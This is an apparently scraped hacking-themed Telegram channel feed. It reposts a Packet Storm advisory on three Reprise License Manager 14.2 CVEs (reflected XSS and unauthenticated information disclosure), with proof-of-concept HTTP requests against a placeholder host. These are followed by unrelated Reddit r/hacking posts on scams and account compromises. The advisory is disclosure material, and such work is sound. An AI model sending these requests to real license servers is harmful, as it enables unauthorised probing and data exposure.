Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
66.1K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Reprise License Manager 14.2 Cross Site Scripting / Information Disclosure

https://4.bp.blogspot.com/-xhbT4GX8v9w/WWlvF89jtmI/AAAAAAAAILM/fSSkvnm11QwzZu21RJEqwX2S4icQcxCngCLcBGAs/s1600/h136.png Reprise License Manager version 14.2 suffers from cross site scripting and information disclosure vulnerabilities.

MD5 | cc55ae7d1b402036a9e2e82e2e0c4ea4Download Multiple Vulnerabilities in Reprise License Manager 14.2

Credit: Giulia Melotti Garibaldi

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

# Product: RLM 14.2
# Vendor: Reprise Software
# CVE ID: CVE-2022-28363
# Vulnerability Title: Reflected Cross-Site Scripting
# Severity: Medium
# Author(s): Giulia Melotti Garibaldi
# Date: 2022-03-29
#
#############################################################
Introduction:
Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required.

Vulnerability PoC:

GET http://HOST:5054/goform/login_process?username=admin&password=admin&ok=LOGIN HTTP/1.1
Host: HOST:5054
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://HOST:5054
Connection: keep-alive
Referer: http://HOST:5054/goform/login_process
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

# Product: RLM 14.2
# Vendor: Reprise Software
# CVE ID: CVE-2022-28364
# Vulnerability Title: Authenticated Reflected Cross-Site Scripting
# Severity: Low
# Author(s): Giulia Melotti Garibaldi
# Date: 2022-03-29
#
#############################################################
Introduction:
Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/rlmswitchr_process "file" parameter via GET. Authentication is required.

Vulnerability PoC:

GET http://HOST:5054/goform/rlmswitchr_process?file= HTTP/1.1
Host: HOST:5054
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Origin: http://HOST:5054
Connection: keep-alive
Referer: http://HOST:5054/goforms/rlmswitchr
Cookie: REDACTED
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# Product: RLM 14.2
# Vendor: Reprise Software
# CVE ID: CVE-2022-28365
# Vulnerability Title: Unauthenticated Information Disclosure
# Severity: Low
# Author(s): Giulia Melotti Garibaldi
# Date: 2022-03-29
#
#############################################################
Introduction:
Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required.
The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.

Vulnerability PoC:

GET http://HOST:5054/goforms/rlminfo HTTP/1.1
Host: HOST:5054
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Content-Length: 0
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Source:packetstormsecurity.com
hacking: security in practice
Is it possible to do this↓?

I want to modify the social networks to avoid my brain getting dumber. Since I need to use them for my job, I want to be able to filter the Instagram (example) content. This means, deleting the 🔍 and only being able to see the accounts I choose.

Also having the possibility of blocking all the content and only using the chat and the stories would be really interesting.

I have seen app blockers but never an inside-app blocker.

submitted by /u/DzyPassio
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Possible new T-mobile phone # scam?

Hey guys, I'm new here but I just came across a scam and I'd like your input on it. So yesterday and today I received a text message in a group chat I was brought into that stated that my bill for the month of March has been paid(even though I'm not the one paying the phone bill). I knew this was a scam but I wanted to look into it because as I already mentioned this was in a group chat. So I ran the links through Virus Total and the report said there was no malware on the sites. I then looked into the status of these websites and they came back invalid. The next thing I did was run a background check on the number that started the group chat I was brought into today. I also checked some of the other numbers that responded with "stop" just to make sure I wasn't being fooled. The number that started the group chat came back as "unknown" and was said to have most likely been based in New York. The other numbers were real but, they could have had their T-mobile accounts compromised and had their phone numbers stolen. The only thing I noticed we all had in common was that our service provider was T-mobile or owned by T-mobile(ex. Metropcs). I went on google and found out that these kinds of scams have been happening for a while. But what makes this different(at least to me) is that in the previous scams it was never mentioned where these numbers are coming from. In this one, not only does it claim to be from T-mobile. The scam number is provided/serviced by T-mobile. I don't know if I'm overthinking this or not but I'd like some outside input. Also, one of the sites I used claims it is 90% sure the scam number is a CLEC(Competitive Local Exchange Carrier), don't know if that changes anything. Thank you for your time.

submitted by /u/MUGGYtheREAPER
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
self signed SSL Cert found in router

so i found a self signed ssl cert trusted by our root CA in our router today. Its obviously fake, any idea what the implications of that would be, or what could be done with such a thing?

submitted by /u/u_b_dat_boi
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Curious as to how I was compromised.

Background info I try take my cybersecurity pretty strict. Just finished sec+, have complex password, 2 FA + authentication app.

Woke up to my Instagram being hacked. What I thought was very very suspicious was the attacker, had created an new gmail with my first + middle + last name. The last name was misspelled. However…. I do not advertise my middle name anywhere. Additionally, my insta account is my first initial and not my complete last name. Example if my name is John Doe I had my insta set up as J.Do. Whoever hacked my Instagram account knew my complete name? They also went as far as to create a new gmail address using my name? I had received no notifications that my original email on my insta account had be changed or that 2 FA was turned off. Additionally my username was changed. The hacker had complete access to my account for 6 hours and all they did was unfollowed one person. I am very curious as to how this is possible, I am a bit embarrassed as I am wanting to work in the cybersecurity field. Would love anyones thoughts.

submitted by /u/Meowsters
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
การอัปเดตความปลอดภัย LayerZero — เมษายน 2022

สัปดาห์ที่ผ่านมาแสดงให้เราเห็นว่าไม่มีอะไรสำคัญไปกว่าความมุ่งมั่นที่จะประเมินและปรับปรุงการรักษาความปลอดภัยอย่างต่อเนื่องในพื้นที่นี้…Continue reading on Medium »
Read more...